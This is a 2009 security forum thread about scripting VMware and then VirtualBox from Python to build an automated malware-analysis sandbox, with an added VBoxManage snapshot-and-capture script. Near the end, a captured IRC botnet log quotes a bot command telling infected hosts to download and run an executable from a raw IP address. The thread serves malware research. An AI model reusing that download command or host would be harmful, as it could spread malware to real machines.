Author Topic: What tools can I use to script VMWare Workstation in Python?  (Read 9232 times)

August 09, 2009, 12:02:56 pm
log0

Hi all gurus,

Could use some help and directions.

I have Windows in VMware that I want to control from my VM host to start/stop/revert/run programs. I am aiming to build an automated, simplified but specialized malware sandbox to extract pcap files (yadayada... anubis is too slow). However, Pyvix doesn't seem to have been updated for 3 years already, and it isn't just the compilation issue (it seems) but mismatching binaries, and so on.

My questions :
1. If I want to script VMware workstation in Python, what are the solutions out there?
2. What are the usual solutions as used by you experts in industries and focused academics?

Thank you.

Log0



"Everyone has got the will to win, it's only those with the will to prepare that do win." - Mark Cuban

honeypots, botnets, crime, etc... let's grep a drink.
On Hacking Across Boundaries - http://onhacks.org

August 09, 2009, 12:22:01 pm
Reply #1

SysAdMini

You have to install the VMware VIX API first.

http://www.vmware.com/support/developer/vix-api/

This API provides bindings for C, Perl, and COM (Visual Basic, VBScript, C#).
VMware doesn't provide bindings for Python, but there are Python bindings.
Look here:

http://groups.google.com/group/vmkernelnewbies/browse_thread/thread/b910fe85b1eebcb2

I haven't used the python bindings, so I don't know how well it works.

 
Ruining the bad guy's day

August 09, 2009, 02:08:34 pm
Reply #2

log0

Hi SysAdMini,

Yes I have installed the ViX. =)

Here is the extract I obtained from pyvix, it looks oooooooooooooooold !!!!!!

pyvix-2006.07.18-source.zip          32.2 KiB     Tue Jul 18 2006 14:44     939

So, I'm just curious if it's a "declared dead" library?

===

BTW, so most people still use the C interface of ViX ( perhaps Perl? ) to automate only?

August 09, 2009, 02:42:05 pm
Reply #3

log0

Aha, that new updated code works better... got some new errors, but there goes the progress. Thanks SysAdMini. =)

August 09, 2009, 04:14:12 pm
Reply #4

log0

Didn't really mean to bug... anyone got this error?

I found this is a pretty common unanswered problem ... not any solutions I got ...

VIX_E_WRAPPER_SERVICEPROVIDER_NOT_FOUND      = 22003
pyvix.vix.VIXException: The system returned an error. Communication with the virtual machine may have been interrupted

I used the powerOn.c helloworld code provided by VMware. Anyway... it fails at connect.
I'll continue to work on it and see what's going to come back... but if anyone has met this, please kindly offer advice.

I really need to post an article on this common problem after I've solved it. =)

Thank you very much.

August 11, 2009, 05:05:09 pm
Reply #5

log0

Yayayaya, I abandoned VMware and picked up (free) VirtualBox. Somehow the installation of ViX didn't work quite well, but why bother fixing it when there's an easier way. Waste no time.

There goes vboxmanage, which does it in a simpler way.

For those interested, I'm building an automated tool for infiltrating botnets... let's see what comes out.

Thanks.
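
A sketch of the revert / capture / run / power-off cycle asked about in this thread, driven through VBoxManage from Python. This is an added example, not code posted by anyone in the thread; the VM name, snapshot name and pcap path are placeholders, and it assumes the clean snapshot was taken with the guest powered off.

```python
import subprocess
import time

VBOXMANAGE = "VBoxManage"  # assumption: the VirtualBox CLI is on PATH


def build_plan(vm, snapshot, pcap_path):
    """Return (setup, teardown) lists of VBoxManage argv for one sample run."""
    restore = [VBOXMANAGE, "snapshot", vm, "restore", snapshot]
    setup = [
        restore,  # start every run from the known-clean state
        # Host-side capture of NIC 1, written outside the guest.
        [VBOXMANAGE, "modifyvm", vm, "--nictrace1", "on",
         "--nictracefile1", pcap_path],
        [VBOXMANAGE, "startvm", vm, "--type", "headless"],
    ]
    # Hard power-off, then revert so no infected disk state is left behind.
    teardown = [[VBOXMANAGE, "controlvm", vm, "poweroff"], restore]
    return setup, teardown


def run_cycle(vm, snapshot, pcap_path, seconds,
              run=subprocess.check_call, sleep=time.sleep):
    """Run one cycle; teardown always executes. Returns (done, failed)."""
    setup, teardown = build_plan(vm, snapshot, pcap_path)
    done, failed = [], []
    try:
        for cmd in setup:
            run(cmd)
            done.append(cmd)
        sleep(seconds)  # observation window while the pcap fills
    except (subprocess.CalledProcessError, OSError) as exc:
        failed.append((cmd, str(exc)))
    finally:
        for cmd in teardown:
            try:
                run(cmd)
                done.append(cmd)
            except (subprocess.CalledProcessError, OSError) as exc:
                failed.append((cmd, str(exc)))
    return done, failed


if __name__ == "__main__":
    # Dry run: print the commands instead of executing them.
    # "winxp-sandbox", "clean" and the pcap path are placeholder names.
    run_cycle("winxp-sandbox", "clean", "/tmp/sample-001.pcap", 120,
              run=lambda cmd: print(" ".join(cmd)), sleep=lambda s: None)
```

The `run` and `sleep` parameters exist so the cycle can be dry-run or unit-tested without VirtualBox installed; with the defaults it calls the real CLI.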

August 12, 2009, 06:33:15 pm
Reply #6

MysteryFCM

Look forward to seeing the results :) (looking into setting up automated analysis myself too)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 12, 2009, 06:40:05 pm
Reply #7

SysAdMini

I tested VirtualBox a few months ago. I was unable to set up a network bridge to my wireless LAN adapter.
I'm wondering if it works in the current virtualbox version. If yes, then I would give it a second chance.

August 22, 2009, 04:40:53 am
Reply #8

log0

>>SysAdMini

oops... a lil busy and then workin' then.

Didn't try bridge wireless before, top two from google :
http://ubuntuforums.org/showthread.php?t=724783h
http://forums.virtualbox.org/viewtopic.php?t=1787

Any luck?

I basically have a tool that can grep traffic for myself, now need to piece up a bot and everything altogether.

===

>> MysteryFCM

Sure, it is just a few pieces of spread-out technology pieced together... I guess a lot of ppl in MDL alrdy got them?

August 23, 2009, 01:00:32 pm
Reply #9

log0

I guess most of these are basic tools to most ppl...everyone gotta build their own guns!

The malware caught - 6/41 ( 14.63 % ) ouch.


Basic

2009-08-23 18:27:20,644 - log-6 - INFO - Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94.76.194.116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]
...

but sadly, still doing it wrong. =)

2009-08-23 18:27:23,560 - log-6 - INFO - Received : [ERROR :Closing Link: [[<my ip>] (Client hat die Verbindung getrennt)]

German stuffs.

Workin' workin' ...